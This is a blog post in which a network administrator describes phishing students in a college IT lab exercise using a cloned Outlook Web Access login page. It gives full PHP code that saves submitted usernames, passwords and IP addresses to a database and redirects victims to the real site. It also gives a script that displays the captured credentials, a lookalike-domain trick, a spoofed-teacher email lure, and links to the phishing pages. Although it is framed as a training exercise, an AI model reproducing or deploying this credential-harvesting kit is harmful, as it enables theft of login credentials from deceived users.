Phishing using a spoofed Outlook Web Access Page

Every year, there is an experiential learning class at the college I graduated from where they do a real world scenario setting up a fictitious company’s IT department.  Servers, switches, routers, firewalls, etc.  The fun thing for the alumni, is that we get to practice some of our network penetration skills.

A few years back, I was fortunate enough to have a group of students leave a few gaping holes open on their network, and decided to teach them a valuable lesson about how a likely targeted attack will happen:  social engineering.

I used an authority figure (the teacher) to lure them to a website where I phished their credentials.  At the time, it wasn’t working as well as I had wanted it to, but gave it a shot anyway.  I purchased a similar domain, sent an email from the “teacher” complaining about problems with OWA.  Sure enough, I had a bite.  It wasn’t just a normal user, it was the domain administrator.  After that, it was game on.  At the time, I didn’t even capture usernames.  The only thing I had was the password.

That bring us to today.  I decided to improve my phishing skills a bit, and we’ll see how it goes.

First step was getting a mirror copy of the OWA web page.  For this, I used a freely available website download tool.

From there, I dived into the source code of the page.  The main thing that needed to be changed was the form action to post to a PHP file I created.

 

OWA Phishing

 

In the same directory you put your spoofed OWA page, you need to create an insert1.php file.  Below is the source code I used (minus database information).  Nice thing about this is the prepared statements prevent a SQL injection attack, in case the students wanted to get some backlash at me.  Notice at the bottom of the code, it redirects to the real OWA.  A feature that was requested the last time I attempted this.

<?php
$mysqli = new mysqli(“dbhostname”, “dbuser”, “dbpassword!”, “dbname”);
/* check connection */
if (mysqli_connect_errno()) {
printf(“Connect failed: %s\n”, mysqli_connect_error());
exit();
}

/* Prepare an insert statement */
$query = “INSERT INTO solar (Username, Password, IP) VALUES (?,?,?)”;
$stmt = $mysqli->prepare($query);
$stmt->bind_param(“sss”, $val1, $val2, $val3);
$val1 = $_POST[‘username’];
$val2 = $_POST[‘password’];
$val3=$_SERVER[‘REMOTE_ADDR’];
/* Execute the statement */
$stmt->execute();

/* close statement */
$stmt->close();

/* close connection */
$mysqli->close();

/* Redirect to new URL */
header( ‘Location: https://mail.solarsystems-it.com/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=https%3a%2f%2fmail.solarsystems-it.com%2fowa%2f’ ) ;

?>

This is the majority of the setup.  I also added a php file to display the contents of this database.

<?php
$mysqli = new mysqli(“dbhost”, “dbuser”, “dbpassword”, “db”);
/* check connection */
if (mysqli_connect_errno()) {
printf(“Connect failed: %s\n”, mysqli_connect_error());
exit();
}
/* retrieve all rows from Solar Table */
$query = “SELECT ID, Username, Password, IP, Time FROM solar”;if ($result = $mysqli->query($query)) {
while ($row = $result->fetch_row()) {
printf(“%s (%s, %s, %s, %s) \n”, $row[0], $row[1], $row[2], $row[3], $row[4]);
}
/* free result set */
$result->close();
}
?>

After this, you’ll have to setup your MySQL database.  I setup mine with the ID (indexed record identifier, auto incrementing), Username, Password, IP, and Time.  I believe the timestamp is created automatically by MySQL.

Now I’m at the fun part.  I’ve purchased the domain soiarsystems-it.com.  I’ll change the case on the I to make it look like an l, and I’ll send a few emails to students pretending to be the teacher complaining about certificate errors on the OWA website (there really are since the page is pulling SSL data from their website).

The main reason for this post is I’ll include a link to it in the source code so the students can know they’ve been had (assuming they view the page source).  I’ll use my custom URL shortener so I can track who clicks it.

So far, they don’t have anything wide open port wise, which is good.  The idea is that if I get usernames and passwords, I’ll see what I can do once I get a hold of an email account on OWA.

Links to the pages:

http://mail.soIarsystems-it.com/owa/auth/logon796b.html

http://mail.soIarsystems-it.com/SolarSystems/owa/auth/display.php

Article written by

Tyler was born and raised in Waterloo, Iowa where he currently resides with his wife Amanda, a cat - Bam, and two sons - Elijah and Benjamin. He is employed as a network administrator with First Security State Bank and enjoys technology and computers. Amanda is a student in at the University of Northern Iowa and is studying to be a teacher. She is also active in the Iowa Army National Guard. She is a 92A, which is a supply specialist.

Leave a Reply

%d bloggers like this: